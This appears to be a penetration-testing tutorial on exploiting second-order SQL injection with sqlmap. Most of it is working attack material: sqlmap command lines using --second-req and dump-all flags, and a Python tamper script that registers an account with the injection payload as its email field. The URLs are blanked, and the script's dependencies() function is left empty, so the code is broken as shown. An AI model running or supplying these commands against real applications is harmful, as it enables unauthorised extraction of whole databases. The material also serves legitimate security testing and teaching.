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Second Order Injection - SQLMap

SQLMap can exploit Second Order SQLis.
****You need to provide:

  • The **request **where the **sqlinjection payload **is going to be saved
  • The **request **where the **payload **will be executed

The request where the SQL injection payload is saved is indicated as in any other injection in sqlmap. The request where sqlmap can read the output/execution of the injection can be indicated with --second-url or with --second-req if you need to indicate a complete request from a file.

Simple second order example:

#Get the SQL payload execution with a GET to a url
sqlmap -r login.txt -p username --second-url ""

#Get the SQL payload execution sending a custom request from a file
sqlmap -r login.txt -p username --second-req details.txt

In several cases this won't be enough because you will need to perform other actions apart from sending the payload and accessing a different page.

When this is needed you can use a sqlmap tamper. For example the following script will register a new user using sqlmap payload as email and logout.

#!/usr/bin/env python

import re
import requests
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

def dependencies():

def login_account(payload):
    proxies = {'http':''}
    cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}

    params = {"username":"asdasdasd", "email":payload, "password":"11111111"}
    url = ""
    pr = requests.post(url, data=params, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

    url = ""
    pr = requests.get(url, cookies=cookies, verify=False, allow_redirects=True, proxies=proxies)

def tamper(payload, **kwargs):
    headers = kwargs.get("headers", {})
    return payload

A SQLMap tamper is always executed before starting a injection try with a payload and it has to return a payload. In this case we don't care about the payload but we care about sending some requests, so the payload isn't changed.

So, if for some reason we need a more complex flow to exploit the second order SQL injection like:

  • Create an account with the SQLi payload inside the "email" field
  • Logout
  • Login with that account (login.txt)
  • Send a request to execute the SQL injection (second.txt)

This sqlmap line will help:

sqlmap --tamper tamper.py -r login.txt -p email --second-req second.txt --proxy --prefix "a2344r3F'" --technique=U --dbms mysql --union-char "DTEC" -a
# --tamper tamper.py : Indicates the tamper to execute before trying each SQLipayload
# -r login.txt : Indicates the request to send the SQLi payload
# -p email : Focus on email parameter (you can do this with an "email=*" inside login.txt
# --second-req second.txt : Request to send to execute the SQLi and get the ouput
# --proxy : Use this proxy
# --technique=U : Help sqlmap indicating the technique to use
# --dbms mysql : Help sqlmap indicating the dbms
# --prefix "a2344r3F'" : Help sqlmap detecting the injection indicating the prefix
# --union-char "DTEC" : Help sqlmap indicating a different union-char so it can identify the vuln
# -a : Dump all